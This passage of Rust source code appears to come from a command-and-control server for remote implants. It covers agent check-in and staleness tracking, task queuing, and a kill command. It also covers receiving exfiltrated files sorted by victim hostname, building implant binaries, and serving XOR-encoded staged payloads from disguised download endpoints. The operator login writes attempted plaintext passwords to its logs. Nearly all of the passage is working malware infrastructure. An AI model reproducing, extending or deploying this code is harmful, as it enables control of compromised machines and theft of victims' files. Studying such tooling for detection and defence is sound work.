    /// Whether the agent has missed its expected check-in window (set by `mark_agents_stale`)
    pub is_stale: bool,
}

impl Agent {
    /// Creates a new agent by querying the database. If the agent exists in the database, that will be
    /// returned, otherwise, a new agent will be inserted and that will be returned.
    async fn from_first_run_data(
        id: &str,
        db: &Db,
        frd: FirstRunData,
    ) -> Result<(Agent, Option<Vec<Task>>), String> {
        match db.get_agent_with_tasks_by_id(id, frd.clone()).await {
            Ok((agent, tasks)) => Ok((agent, tasks)),
            Err(e) => match e {
                sqlx::Error::RowNotFound => {
                    // Add the new agent into the db, and also return with it an empty vec
                    let new_agent = db
                        .insert_new_agent(id, frd)
                        .await
                        .map_err(|e| e.to_string())?;
                    return Ok((new_agent, None));
                }
                _ => {
                    return Err(e.to_string());
                }
            },
        }
    }

    pub fn get_config_data(&self) -> Vec<Task> {
        //
        // Here we. can push any tasks to the queue which we want the implant to execute at the point
        // of its first run, to set up any of its environment / runtime related tasks. For example, we can
        // set its sleep to be the last sleep setting the operator changed it to, where that would differ
        // from what is hardcoded.
        //

        vec![Task {
            id: 0,
            command: Command::UpdateSleepTime,
            metadata: Some(self.sleep.to_string()),
            completed_time: 0,
        }]
    }
}

/// Shared, lockable handle to a single [`Agent`] in the live list
type AgentHandle = Arc<RwLock<Agent>>;

/// AgentList holds data pertaining to the in-memory representation of all active agents connected
/// to the C2.
pub struct AgentList {
    // Each agent is represented by a HashMap where the Key is the ID, and the value is the Agent
    agents: RwLock<HashMap<String, AgentHandle>>,
}

impl AgentList {
    /// Creates an empty `AgentList`. NOTE: this is an inherent method, not an
    /// implementation of the `Default` trait.
    pub fn default() -> Self {
        Self {
            agents: RwLock::new(HashMap::new()),
        }
    }

    /// Clones out the current set of agent handles under a short-lived read lock, so
    /// callers can iterate without holding the map lock across awaits.
    async fn snapshot_handles(&self) -> Vec<AgentHandle> {
        let lock = self.agents.read().await;
        lock.values().cloned().collect()
    }

    /// Returns owned copies of every agent currently in the live list.
    pub async fn snapshot_agents(&self) -> Vec<Agent> {
        let handles = self.snapshot_handles().await;
        let mut agents = Vec::with_capacity(handles.len());

        for handle in handles {
            let agent = handle.read().await;
            agents.push(agent.clone());
        }

        agents
    }

    /// Enumerates over all agents, determines whether each is stale by calculating if we have
    /// gone past the expected check-in time of the agent by some time, `n` (where `n` is in seconds).
    pub async fn mark_agents_stale(&self) {
        let handles = self.snapshot_handles().await;

        for handle in handles {
            // Read the needed fields, dropping the read guard before taking the write
            // guard below
            let (sleep, last_checkin_time) = {
                let lock = handle.read().await;
                (lock.sleep, lock.last_checkin_time)
            };

            let margin = Duration::seconds(calculate_max_time_till_stale(sleep).await);
            let now: DateTime<Utc> = Utc::now();

            // Stale once `now` is beyond last check-in + one sleep interval + the margin
            let mut lock = handle.write().await;
            lock.is_stale = last_checkin_time + Duration::seconds(sleep as _) + margin < now;
        }
    }

    /// Gets an [`Agent`] from the HTTP request headers; if no such agent is currently connected
    /// an agent will be returned and added to the live list of agents.
    ///
    /// # Returns
    /// - An owned **copy** of the agent in the live list
    /// - An option of a Vector of Tasks, to be completed by the agent
    pub async fn get_agent_and_tasks_by_header(
        &self,
        headers: &HeaderMap,
        db: &Db,
        first_run_data: Option<FirstRunData>,
    ) -> Result<(Agent, Option<Vec<Task>>), String> {
        // Lookup the agent ID by extracting it from the headers
        let agent_id = extract_agent_id(headers)?;

        // Set when we insert a previously-unseen agent that did not send first run data;
        // in that case a task is appended below to have the agent re-send it
        let mut re_request_frd: bool = false;

        //
        // Get or insert the agent
        //
        let existing = {
            let lock = self.agents.read().await;
            lock.get(&agent_id).cloned()
        };

        let handle: AgentHandle = if let Some(entry) = existing {
            entry
        } else {
            // Bound the db call so a slow database cannot stall the agent check-in path
            let Ok(db_call) = timeout(
                tokio::time::Duration::from_secs(5),
                Agent::from_first_run_data(
                    &agent_id,
                    db,
                    first_run_data.clone().unwrap_or_default(),
                ),
            )
            .await
            else {
                return Err("DB timeout in critical path".to_string());
            };

            let (new_agent, _) = match db_call {
                Ok(result) => result,
                Err(e) => {
                    return Err(format!("Failed to complete from_first_run_data. {e}"));
                }
            };

            // Another task may have inserted this agent while we were awaiting the db;
            // prefer the existing handle in that case rather than clobbering it
            let arc = Arc::new(RwLock::new(new_agent));
            let mut lock = self.agents.write().await;
            if let Some(existing) = lock.get(&agent_id) {
                Arc::clone(existing)
            } else {
                re_request_frd = first_run_data.is_none();
                lock.insert(agent_id.clone(), arc.clone());
                arc
            }
        };

        //
        // Update in place
        //

        let mut agent_for_db = {
            let mut lock = handle.write().await;
            if let Some(frd) = first_run_data {
                lock.first_run_data = frd;
            }
            lock.clone()
        };

        if let Err(e) = db.update_agent_checkin_time(&mut agent_for_db).await {
            return Err(format!("Failed to update checkin time. {e}"));
        }

        // Write the db-updated check-in data back to the live entry
        {
            let mut lock = handle.write().await;
            lock.last_checkin_time = agent_for_db.last_checkin_time;
            lock.first_run_data = agent_for_db.first_run_data.clone();
        }

        let Ok(mut tasks) = db.get_tasks_for_agent_by_uid(&agent_id).await else {
            return Err("Failed to get tasks for agent by UID.".to_string());
        };

        // Here is where we handle the case of needing to task first run data again
        if re_request_frd {
            let task = Task {
                id: 0,
                command: Command::AgentsFirstSessionBeacon,
                metadata: None,
                completed_time: 0,
            };

            match tasks.as_mut() {
                Some(tasks) => {
                    tasks.push(task);
                }
                None => tasks = Some(vec![task]),
            }
        }

        let snapshot = {
            let agent_guard = handle.read().await;
            agent_guard.clone()
        };

        Ok((snapshot, tasks))
    }

    /// Returns whether an agent with the given ID is present in the live list.
    pub async fn contains_agent_by_id(&self, id: &str) -> bool {
        let lock = self.agents.read().await;
        lock.contains_key(id)
    }

    /// Removes an agent with the given ID from the live list, if present.
    pub async fn remove_agent(&self, id: &str) {
        let mut lock = self.agents.write().await;
        lock.remove(id);
    }
}

/// Extracts the agent ID from the `WWW-Authenticate` header of the request.
///
/// # Errors
/// Returns an `Err` with a description should the agent ID (or any WWW-Authenticate header)
/// not be found, or should its value not convert cleanly to a `&str`. Such requests are
/// rejected by callers rather than handled.
pub fn extract_agent_id(headers: &HeaderMap) -> Result<String, String> {
    let Some(result) = headers.get("WWW-Authenticate") else {
        return Err("No agent id found in request".to_string());
    };

    let Ok(result) = result.to_str() else {
        return Err("Could not convert agent header to str".to_string());
    };

    Ok(result.to_string())
}

/// Checks whether the agent has the kill command as part of its tasks.
///
/// If the command is present, the agent will be removed from the list of active agents.
pub async fn handle_kill_command(
    agent_list: Arc<AgentList>,
    agent: &Agent,
    tasks: &Option<Vec<Task>>,
) {
    // The `if let` already covers the `None` case, so no separate `is_none` guard is needed
    if let Some(t) = tasks.as_ref() {
        if tasks_contains_kill_agent(t) {
            agent_list.remove_agent(&agent.uid).await;
        }
    }
}

/// Calculates the maximum time the agent can sleep for before becoming stale, and is set to
/// double the sleep time.
///
/// # Returns
/// An `i64` of the time (seconds) to wait before marking as stale. If there is an integer error
/// (overflow during the multiply, or the value does not fit in an `i64`), an error is logged and
/// the return value falls back to the original sleep time (saturated to `i64::MAX` if needed).
async fn calculate_max_time_till_stale(sleep: u64) -> i64 {
    const MAX_SLEEP_TILL_STALE_MUL: u64 = 2;

    let doubled = match sleep.checked_mul(MAX_SLEEP_TILL_STALE_MUL) {
        Some(s) => s,
        None => {
            log_error_async(&format!(
                "Failed to multiply sleep time from input time: {sleep}."
            ))
            .await;

            sleep
        }
    };

    // `try_from` rather than a lossy `as` cast: `as i64` would silently wrap to a
    // negative value for very large sleep times
    match i64::try_from(doubled) {
        Ok(res) => res,
        Err(_) => {
            log_error_async(&format!("Sleep time was negative time: {doubled}.")).await;

            // Saturate rather than wrap if even the raw sleep does not fit in an i64
            i64::try_from(sleep).unwrap_or(i64::MAX)
        }
    }
}


================================================
FILE: c2/src/api/admin_routes.rs
================================================
use std::{net::SocketAddr, sync::Arc};

use crate::{
    AUTH_COOKIE_NAME, COOKIE_TTL,
    admin_task_dispatch::{dispatch_table::admin_dispatch, implant_builder::build_all_bins},
    app_state::AppState,
    logging::{log_admin_login_attempt, log_error_async},
    middleware::{create_new_operator, verify_password},
};
use axum::{
    Json,
    extract::{Multipart, Path, State},
    http::{
        HeaderMap, StatusCode,
        header::{CONTENT_DISPOSITION, CONTENT_TYPE},
    },
    response::{Html, IntoResponse, Response},
};
use axum_extra::extract::{
    CookieJar,
    cookie::{Cookie, SameSite},
};
use shared::{
    net::AdminLoginPacket,
    tasks::{AdminCommand, BaBData, FileUploadStagingFromClient, WyrmResult},
};

/// Dispatches an admin command that targets a specific agent (by its `uid` path segment),
/// returning the serialised dispatch result with `202 ACCEPTED`.
pub async fn handle_admin_commands_on_agent(
    state: State<Arc<AppState>>,
    Path(uid): Path<String>,
    command: Json<AdminCommand>,
) -> (StatusCode, Vec<u8>) {
    let body = admin_dispatch(Some(uid), command.0, state).await;

    (StatusCode::ACCEPTED, body)
}

/// Dispatches an admin command that does not target a specific agent, returning the
/// serialised dispatch result with `202 ACCEPTED`.
pub async fn handle_admin_commands_without_agent(
    state: State<Arc<AppState>>,
    command: Json<AdminCommand>,
) -> (StatusCode, Vec<u8>) {
    let body = admin_dispatch(None, command.0, state).await;

    (StatusCode::ACCEPTED, body)
}

/// Reports whether the given agent has pending notifications: `200 OK` when notifications
/// are pending or the agent is currently connected, `404 NOT FOUND` otherwise, and a
/// `500` with an empty body on a database error.
pub async fn poll_agent_notifications(
    state: State<Arc<AppState>>,
    Path(uid): Path<String>,
) -> (StatusCode, String) {
    let pending = state.db_pool.agent_has_pending_notifications(&uid).await;

    let has_pending = match pending {
        Ok(p) => p,
        Err(e) => {
            log_error_async(&format!("Error polling pending notifications. {e}")).await;
            return (StatusCode::INTERNAL_SERVER_ERROR, "".to_string());
        }
    };

    let status = if has_pending || state.connected_agents.contains_agent_by_id(&uid).await {
        StatusCode::OK
    } else {
        StatusCode::NOT_FOUND
    };

    (status, has_pending.to_string())
}

pub async fn build_all_binaries_handler(
    state: State<Arc<AppState>>,
    Json(data): Json<BaBData>,
) -> Response {
    let result = build_all_bins(&data.implant_key, state).await;

    match result {
        Ok(zip_bytes) => {
            //
            // Prepare the data response back to the client and send it.
            //
            let filename = format!("{}.7z", data.implant_key);
            (
                StatusCode::ACCEPTED,
                [
                    (CONTENT_TYPE, "application/x-7z-compressed".to_string()),
                    (
                        CONTENT_DISPOSITION,
                        format!("attachment; filename=\"{}\"", filename),
                    ),
                ],
                zip_bytes,
            )
                .into_response()
        }
        Err(e) => {
            log_error_async(&e).await;

            (
                StatusCode::INTERNAL_SERVER_ERROR,
                Html(format!("Error building binaries: {e}",)),
            )
                .into_response()
        }
    }
}

/// Authenticates an operator from a login packet. Where the operator table has no row for
/// the username at all, the first login bootstraps the operator account (single-operator
/// mode). On success a session cookie is added to the jar; failure paths respond `404`
/// (or `500` on a db error).
///
/// NOTE(review): plaintext passwords are passed to the login-attempt log and error log
/// throughout this function — confirm capturing attempted credentials is intended.
pub async fn admin_login(
    jar: CookieJar,
    state: State<Arc<AppState>>,
    headers: HeaderMap,
    Json(body): Json<AdminLoginPacket>,
) -> (CookieJar, Response) {
    // Best-effort source IP for the audit log; relies on a proxy setting X-Forwarded-For
    let ip = if let Some(h) = headers.get("X-Forwarded-For") {
        h.to_str().unwrap_or("Not Found")
    } else {
        "Not found"
    };
    let username = body.username;
    let password = body.password;

    // Lookup the operator from the db, if its empty we will create the user in the inner match here.
    let operator = match state.db_pool.lookup_operator(&username).await {
        Ok(o) => o,
        Err(e) => {
            match e {
                sqlx::Error::RowNotFound => {
                    // The db is empty so create the user. The db insert function checks
                    // for us if a user already exists, if so, it will panic as we don't want anybody
                    // and everybody creating accounts! And we aren't yet multiplayer
                    // create_new_operator(username, password, state.clone()).await;
                    create_new_operator(&username, &password, state.0.clone()).await;
                    log_admin_login_attempt(&username, &password, ip, true).await;
                    // Now try get the user again, and continue execution
                    state.db_pool.lookup_operator(&username).await.unwrap()
                }
                _ => {
                    log_error_async(&format!(
                        "There was an error with the db whilst trying to log in with creds: \
                        {username} {password}. {e}",
                    ))
                    .await;
                    log_admin_login_attempt(&username, &password, ip, false).await;
                    return (jar, StatusCode::INTERNAL_SERVER_ERROR.into_response());
                }
            }
        }
    };

    // We got a result.. lets check the password
    if let Some((db_username, db_hash, db_salt)) = operator {
        // Check the username is the same as the db username, as we are doing single operator ops right now
        // we dont want to allow for easier password spraying, at least username is one additional step of
        // complexity.

        if username.ne(&db_username) {
            log_admin_login_attempt(&username, &password, ip, false).await;
            return (jar, StatusCode::NOT_FOUND.into_response());
        }

        if verify_password(&password, &db_hash, &db_salt).await {
            // At this point in here we have successfully authenticated..
            log_admin_login_attempt(&username, &password, ip, true).await;

            let sid = state.create_session_key().await;

            // Session cookie: HTTP-only, Secure, SameSite=None, TTL from COOKIE_TTL
            let cookie = Cookie::build((AUTH_COOKIE_NAME, sid))
                .path("/")
                .http_only(true)
                .same_site(SameSite::None)
                .max_age(COOKIE_TTL.try_into().unwrap())
                .secure(true)
                .build();

            let jar = jar.add(cookie);
            return (jar, (StatusCode::ACCEPTED).into_response());
        } else {
            // Bad password...
            log_admin_login_attempt(&username, &password, ip, false).await;
            return (jar, StatusCode::NOT_FOUND.into_response());
        }
    }

    //
    // Anything that falls through to this point is invalid
    //
    log_admin_login_attempt(&username, &password, ip, false).await;
    (jar, StatusCode::NOT_FOUND.into_response())
}

/// Public route that is reachable only by the admin after going through
/// the middleware, serves as a health check as to whether their token is
/// valid or not.
pub async fn is_adm_logged_in() -> Response {
    // Reaching this handler at all means the middleware accepted the session token
    (StatusCode::OK).into_response()
}

/// Acknowledges an admin logout request with `202 ACCEPTED`.
// NOTE(review): no server-side session invalidation happens in this handler — confirm the
// session key is revoked elsewhere / the client discards the cookie.
pub async fn logout() -> Response {
    (StatusCode::ACCEPTED).into_response()
}

/// Receives a multipart upload from the admin client and stages the file on the C2.
///
/// Expects a `file` field (the bytes) plus `download_name` / `api_endpoint` text fields.
/// Where no explicit `download_name` is supplied, the uploaded file's own filename is used.
///
/// # Returns
/// - `400 BAD REQUEST`: a required field is missing or empty
/// - `202 ACCEPTED`: the file was staged successfully
/// - `500 INTERNAL SERVER ERROR`: staging failed
pub async fn admin_upload(
    State(state): State<Arc<AppState>>,
    mut multipart: Multipart,
) -> StatusCode {
    let mut file_bytes = Vec::new();
    let mut download_name = String::new();
    let mut api_endpoint = String::new();

    while let Some(field) = multipart.next_field().await.unwrap_or(None) {
        match field.name() {
            Some("file") => {
                let fname = field.file_name().map(|f| f.to_string());
                let bytes = field.bytes().await.unwrap_or_default();
                file_bytes = bytes.to_vec();

                // Fall back to the uploaded file's own name if no explicit
                // download_name field has been seen yet
                if download_name.is_empty() {
                    if let Some(fname) = fname {
                        download_name = fname;
                    }
                }
            }
            Some("download_name") => download_name = field.text().await.unwrap_or_default(),
            Some("api_endpoint") => api_endpoint = field.text().await.unwrap_or_default(),
            _ => {}
        }
    }

    if download_name.is_empty() || api_endpoint.is_empty() || file_bytes.is_empty() {
        return StatusCode::BAD_REQUEST;
    }

    let data = FileUploadStagingFromClient {
        download_name,
        api_endpoint,
        file_data: file_bytes,
    };
    let res = admin_dispatch(None, AdminCommand::StageFileOnC2(data), State(state)).await;

    // Match directly on the deserialised dispatch result, rather than round-tripping
    // the outcome through a raw u16 status code
    match serde_json::from_slice::<Option<WyrmResult<String>>>(&res) {
        Ok(Some(WyrmResult::Ok(_))) => StatusCode::ACCEPTED,
        _ => StatusCode::INTERNAL_SERVER_ERROR,
    }
}


================================================
FILE: c2/src/api/agent_get.rs
================================================
use std::sync::Arc;

use crate::{
    agents::handle_kill_command,
    app_state::AppState,
    logging::log_error_async,
    net::{serialise_tasks_for_agent, serve_file},
};
use axum::{
    extract::{Path, Request, State},
    http::StatusCode,
    response::{IntoResponse, Response},
};

/// Handles the inbound connection, after authentication has validated the agent.
///
/// This is very much the 'end destination' for the inbound connection.
#[axum::debug_handler]
pub async fn handle_agent_get(state: State<Arc<AppState>>, request: Request) -> Response {
    // Get the agent by its header, and fetch tasks from the db. Borrow the pool directly;
    // no clone of the whole state is required for that.
    let (agent, tasks) = match state
        .connected_agents
        .get_agent_and_tasks_by_header(request.headers(), &state.db_pool, None)
        .await
    {
        Ok((a, t)) => (a, t),
        Err(e) => {
            log_error_async(&e).await;
            return StatusCode::BAD_GATEWAY.into_response();
        }
    };

    // Check whether the kill command is present and the agent needs removing from the live list..
    handle_kill_command(state.connected_agents.clone(), &agent, &tasks).await;

    serialise_tasks_for_agent(tasks).await.into_response()
}

/// Handles the inbound connection when the URI contains a path. The function will check to see if the path
/// is present in either the active C2 listener endpoints, or whether it is used to serve content.
#[axum::debug_handler]
pub async fn handle_agent_get_with_path(
    state: State<Arc<AppState>>,
    Path(endpoint): Path<String>,
    request: Request,
) -> Response {
    //
    // Take only what we need under a short read lock, rather than cloning the entire
    // endpoint table for every request. The guard is released before any await below.
    //
    let (is_c2_endpoint, download_metadata) = {
        let endpoints = state.endpoints.read().await;
        (
            endpoints.c2_endpoints.contains(&endpoint),
            endpoints.download_endpoints.get(&endpoint).cloned(),
        )
    };

    //
    // First check whether the URI is in the valid GET endpoints for the agent
    //
    if is_c2_endpoint {
        // There is no need to authenticate here, that is done subsequently during
        // `handle_agent_get` where we pull the agent_id from the header
        return handle_agent_get(state, request).await.into_response();
    }

    //
    // Now we check whether it was a request to the download URI, if it is, we can serve that content
    // over to them.
    //
    if let Some(metadata) = download_metadata {
        if let Err(e) = state.db_pool.update_download_count(&endpoint).await {
            log_error_async(&format!("Could not update download count. {e}")).await;
        };

        return serve_file(&metadata.file_name, metadata.xor_key)
            .await
            .into_response();
    }

    StatusCode::BAD_GATEWAY.into_response()
}


================================================
FILE: c2/src/api/agent_post.rs
================================================
use std::sync::Arc;

use crate::{
    EXFIL_PATH,
    agents::{extract_agent_id, handle_kill_command},
    app_state::AppState,
    exfil::handle_exfiltrated_file,
    logging::log_error_async,
    net::serialise_tasks_for_agent,
};
use axum::{
    Json,
    body::Body,
    extract::{FromRequest, Multipart, Path, Request, State},
    http::{HeaderMap, StatusCode, header::CONTENT_TYPE},
    response::IntoResponse,
};
use futures::{StreamExt, TryStreamExt};
use shared::{
    net::{XorEncode, decode_http_response},
    tasks::{Command, FirstRunData},
};
use tokio::io::AsyncWriteExt;

/// Handles an agent POST on a pathed URI. The path must match a live C2 endpoint;
/// multipart bodies are treated as file exfiltration, anything else is decoded as a
/// standard batch of task results.
pub async fn agent_post_handler_with_path(
    state: State<Arc<AppState>>,
    headers: HeaderMap,
    Path(endpoint): Path<String>,
    req: Request<Body>,
) -> impl IntoResponse {
    // Validate the endpoint under a short read lock, released before any further awaits
    let is_c2_endpoint = {
        let lock = state.endpoints.read().await;
        lock.c2_endpoints.contains(&endpoint)
    };

    // endpoint not found / valid
    if !is_c2_endpoint {
        return StatusCode::BAD_GATEWAY.into_response();
    }

    if is_multipart(req.headers()) {
        return match Multipart::from_request(req, &state).await {
            Ok(mp) => receive_exfil(mp).await.into_response(),
            Err(_) => StatusCode::BAD_REQUEST.into_response(),
        };
    }

    match Json::<Vec<Vec<u8>>>::from_request(req, &state).await {
        Ok(json) => handle_agent_post_standard(state, headers, json)
            .await
            .into_response(),
        Err(_) => StatusCode::BAD_REQUEST.into_response(),
    }
}

/// Handles an agent POST on the root path: multipart bodies are treated as file
/// exfiltration, anything else is decoded as a standard batch of task results.
pub async fn agent_post_handler(
    state: State<Arc<AppState>>,
    headers: HeaderMap,
    req: Request<Body>,
) -> impl IntoResponse {
    if is_multipart(req.headers()) {
        return match Multipart::from_request(req, &state).await {
            Ok(mp) => receive_exfil(mp).await.into_response(),
            Err(_) => StatusCode::BAD_REQUEST.into_response(),
        };
    }

    let payload = match Json::<Vec<Vec<u8>>>::from_request(req, &state).await {
        Ok(p) => p,
        Err(_) => return StatusCode::BAD_REQUEST.into_response(),
    };

    match handle_agent_post_standard(state, headers, payload).await {
        Ok(r) => r.into_response(),
        Err(e) => {
            log_error_async(&e).await;
            StatusCode::BAD_GATEWAY.into_response()
        }
    }
}

/// Core processing for an agent's standard (JSON) POST beacon.
///
/// Each element of `payload` is an XOR-encoded, serialised task result. Results are
/// decoded, persisted, and any newly queued tasks for the agent are serialised and
/// returned as the response body.
///
/// # Errors
/// Returns a `String` describing the failure. The caller is responsible for logging it
/// and mapping it to an HTTP status - the message must never be sent to the agent.
async fn handle_agent_post_standard(
    state: State<Arc<AppState>>,
    headers: HeaderMap,
    Json(payload): Json<Vec<Vec<u8>>>,
) -> Result<Vec<u8>, String> {
    let cl = state.clone();

    // We check the payload length later in an assert to make sure there is no incorrect state going on.
    let payload_len = payload.len();

    for item in payload {
        let decoded = item.xor_network_stream();

        let mut task = decode_http_response(&decoded);

        //
        // First we check here whether the agent is connecting for the FIRST time since it was exited.
        // For example, from a reboot, or from killing the process.
        // This does not mean, first time ever seen like full stop, that doesn't matter.
        //
        // We split the separation because we don't want to start making things completed as below with
        // `mark_task_completed`, or adding to the completed pool, as this task will never exist in the database.
        // It serves only the implant itself.
        //
        // NOTE: This branch will RETURN from the processing of the beacons tasks; in theory there should ONLY
        // ever be this one `Command` sent up to the C2 on first connect, so it should be fine - I cannot see
        // any circumstance where other tasks will be pending processing along-with this command, unless we mess
        // up and accidentally write this task somewhere we shouldn't. If that happens, hopefully this comment
        // will help debug :).
        //
        if task.command == Command::AgentsFirstSessionBeacon {
            // Validate the state that there is only 1 task.
            // The invalid state will brick implants, so forces the bug to be reviewed if it appears.
            // But.. this should never appear.
            assert!(payload_len == 1);

            let Some(metadata) = task.metadata else {
                return Err("Task metadata was None".to_string());
            };

            // The metadata is remote-controlled input: return an error (logged by the
            // caller) instead of panicking, which would let a malformed beacon take the
            // server task down.
            let first_run_data: FirstRunData = serde_json::from_str(&metadata)
                .map_err(|e| format!("Failed to deserialise first run data from string. {e}"))?;

            // Serialise the tasks and send them back
            let (agent, tasks) = state
                .connected_agents
                .get_agent_and_tasks_by_header(&headers, &cl.db_pool, Some(first_run_data))
                .await?;

            let mut init_tasks = agent.get_config_data();
            if let Some(mut tasks) = tasks {
                init_tasks.append(&mut tasks);
            }

            return Ok(serialise_tasks_for_agent(Some(init_tasks)).await);
        }

        //
        // Command::AgentsFirstSessionBeacon was not present, so continue to the normal flow.
        //

        // Every remaining branch needs the agent's ID; extract it once per task instead
        // of re-parsing the headers in each branch.
        let agent_id = extract_agent_id(&headers)?;

        // Handle file exfil - save to disk and remove the exfil bytes, we dont want to store those
        // in the database if we are saving the file to disk.
        if task.command == Command::Pull {
            handle_exfiltrated_file(&mut task).await;
        }

        // If we have console messages, we need to explicitly put these in as a new task; although it isn't
        // a task strictly speaking, not doing so breaks the current model
        if task.command == Command::ConsoleMessages {
            let id = state
                .db_pool
                .add_task_for_agent_by_id(&agent_id, Command::ConsoleMessages, None)
                .await
                .map_err(|e| format!("Failed to add task for agent by ID: {agent_id} {e}"))?;

            // Overwrite the task ID from 1 to the new one
            task.id = id;
        }

        // Persist the result; failures are logged but do not abort processing of the
        // remaining items in the payload.
        if let Err(e) = state.db_pool.mark_task_completed(&task).await {
            log_error_async(&format!(
                "Failed to complete task in db where task ID = {}. {e}",
                task.id
            ))
            .await;
        }

        if let Err(e) = state.db_pool.add_completed_task(&task, &agent_id).await {
            log_error_async(&format!(
                "Failed to add task results to completed table where task ID = {}. {e}",
                task.id
            ))
            .await
        }
    }

    //
    // Get any additional tasks from the database.
    //
    let (agent, tasks) = state
        .connected_agents
        .get_agent_and_tasks_by_header(&headers, &cl.db_pool, None)
        .await?;

    //
    // Check whether the kill command is present and the agent needs removing from the live list..
    //
    handle_kill_command(state.connected_agents.clone(), &agent, &tasks).await;

    //
    // Serialise the response and return it
    //
    Ok(serialise_tasks_for_agent(tasks).await)
}

/// Receives a multipart file-exfiltration upload and streams it to disk under
/// `EXFIL_PATH/<hostname>/<source_path>`.
///
/// Field ordering matters: `hostname` and `source_path` must arrive before `file`.
/// Both values are remote-controlled, so the destination is checked for `..`
/// components to keep writes inside `EXFIL_PATH`.
async fn receive_exfil(mut mp: Multipart) -> Result<StatusCode, StatusCode> {
    let mut hostname: Option<String> = None;
    let mut source_path: Option<String> = None;

    while let Some(field) = mp.next_field().await.map_err(|_| StatusCode::BAD_REQUEST)? {
        match field.name() {
            Some("hostname") => {
                hostname = Some(field.text().await.map_err(|_| StatusCode::BAD_REQUEST)?)
            }
            Some("source_path") => {
                source_path = Some(field.text().await.map_err(|_| StatusCode::BAD_REQUEST)?)
            }
            Some("file") => {
                let host = hostname.as_deref().ok_or(StatusCode::BAD_REQUEST)?;
                let path = source_path.as_deref().ok_or(StatusCode::BAD_REQUEST)?;

                let mut dest = format!("{EXFIL_PATH}/{host}/{path}");
                dest = dest.replace(r"C:\", "").replace('\\', "/");

                // `host` and `path` come from the remote peer: reject any `..`
                // component so the upload cannot traverse out of EXFIL_PATH and
                // overwrite arbitrary files on the server.
                if std::path::Path::new(&dest)
                    .components()
                    .any(|c| matches!(c, std::path::Component::ParentDir))
                {
                    return Err(StatusCode::BAD_REQUEST);
                }

                if let Some(parent) = std::path::Path::new(&dest).parent() {
                    tokio::fs::create_dir_all(parent)
                        .await
                        .map_err(|_| StatusCode::INTERNAL_SERVER_ERROR)?;
                }

                let mut out = tokio::fs::File::create(&dest)
                    .await
                    .map_err(|_| StatusCode::INTERNAL_SERVER_ERROR)?;

                // Stream chunks straight to disk rather than buffering the whole file.
                let mut stream = field.into_stream();
                while let Some(chunk) = stream.next().await {
                    out.write_all(&chunk.map_err(|_| StatusCode::BAD_REQUEST)?)
                        .await
                        .map_err(|_| StatusCode::INTERNAL_SERVER_ERROR)?;
                }
            }
            _ => {}
        }
    }

    Ok(StatusCode::OK)
}

/// True when the request's `Content-Type` header declares any `multipart/*` media type.
fn is_multipart(headers: &HeaderMap) -> bool {
    match headers.get(CONTENT_TYPE).and_then(|v| v.to_str().ok()) {
        Some(content_type) => content_type.starts_with("multipart/"),
        None => false,
    }
}


================================================
FILE: c2/src/api/mod.rs
================================================
pub mod admin_routes;
pub mod agent_get;
pub mod agent_post;


================================================
FILE: c2/src/app_state.rs
================================================
use std::{
    collections::{HashMap, HashSet},
    env,
    path::PathBuf,
    sync::Arc,
    time::{Duration, Instant},
};

use rand::{Rng, distr::Alphanumeric};
use tokio::{
    sync::{Mutex, RwLock},
    time::sleep,
};

use crate::{
    COOKIE_TTL, FILE_STORE_PATH,
    agents::AgentList,
    db::Db,
    logging::log_error_async,
    profiles::{Profile, add_listeners_from_profiles, add_tokens_from_profiles},
};

/// Shared application state handed to every Axum handler via `Arc`.
pub struct AppState {
    /// The agents currently connected to the C2 which are able to be interacted with
    pub connected_agents: Arc<AgentList>,
    /// Database pool
    pub db_pool: Db,
    /// C2 check-in endpoints and staged-download endpoints, mutable at runtime
    pub endpoints: RwLock<Endpoints>,
    /// Tokens added during the agent creation wizard in which validate agents who are authorised to talk to the C2
    pub agent_tokens: RwLock<HashSet<String>>,
    /// The active malleable profile configuration
    pub profile: RwLock<Profile>,
    // Operator session keys mapped to their creation time; expired entries are
    // pruned periodically by `track_sessions`.
    sessions: Arc<Mutex<HashMap<String, Instant>>>,
}

/// Metadata for a single staged-download endpoint: the on-disk file it serves, its
/// internal name, and an optional single-byte XOR key applied to the served bytes.
#[derive(Debug, Clone)]
pub struct DownloadEndpointData {
    pub file_name: String,
    pub internal_name: String,
    pub xor_key: Option<u8>,
}

impl DownloadEndpointData {
    /// Builds a new record, copying both name fields into owned `String`s.
    pub fn new(file_name: &str, internal_name: &str, xor_key: Option<u8>) -> Self {
        DownloadEndpointData {
            file_name: file_name.to_string(),
            internal_name: internal_name.to_string(),
            xor_key,
        }
    }
}

#[derive(Debug, Clone)]
pub struct Endpoints {
    /// API endpoints which can be polled by the agent to check in / get tasks / POST data
    pub c2_endpoints: HashSet<String>,
    /// `HashMap<endpoint, DownloadEndpointData>` - A collection of URI endpoints,
    /// not including a /, which can serve agents over HTTP(s).
    pub download_endpoints: HashMap<String, DownloadEndpointData>,
}

impl Endpoints {
    /// Searches for, and formats with a leading `/` a download endpoint if it exists.
    ///
    /// # Returns
    /// - `Some` containing `/download_endpoint` if it exists.
    /// - `None` if the endpoint was not found.
    pub fn find_format_download_endpoint(&self, needle: &str) -> Option<String> {
        // Keys are exact endpoint strings, so a direct map lookup replaces the
        // previous linear scan over every entry.
        if self.download_endpoints.contains_key(needle) {
            // The URI doesn't include the leading /, so we add it here
            Some(format!("/{needle}"))
        } else {
            None
        }
    }

    /// Reads a staged file from `FILE_STORE_PATH` by its on-disk file name.
    ///
    /// # Returns
    /// - `Ok` with the raw file bytes when a matching entry exists and the read succeeds.
    /// - `Err` with a description when the name is unknown or the file cannot be read.
    pub async fn read_staged_file_by_file_name(&self, needle: &str) -> Result<Vec<u8>, String> {
        //
        // Note internal name is NOT used.. so filename it is
        // TODO rm internal_name from the DownloadEndpointData if not needed
        //
        for (_, v) in self.download_endpoints.iter() {
            if v.file_name == needle {
                let mut path = PathBuf::from(FILE_STORE_PATH);
                path.push(&v.file_name);

                let tool_data = match tokio::fs::read(&path).await {
                    Ok(f) => f,
                    Err(e) => {
                        return Err(format!("Could not read file {}, {e}", path.display()));
                    }
                };

                return Ok(tool_data);
            }
        }

        Err(format!(
            "Could not find {needle} in staged resources by internal name"
        ))
    }
}

impl AppState {
    /// Builds the application state from the database pool and active profile, merging
    /// endpoint/token configuration from both the database and the profile.
    ///
    /// # Panics
    /// Panics when the agent-related configuration cannot be loaded from the database -
    /// the server cannot operate without it.
    pub async fn from(db_pool: Db, profile: Profile) -> Self {
        // Fetch the endpoints from the database that we are going to use. If none are setup, it will
        // default to `::new()` for each type.
        let (mut c2_endpoints, download_endpoints, mut agent_tokens) = db_pool
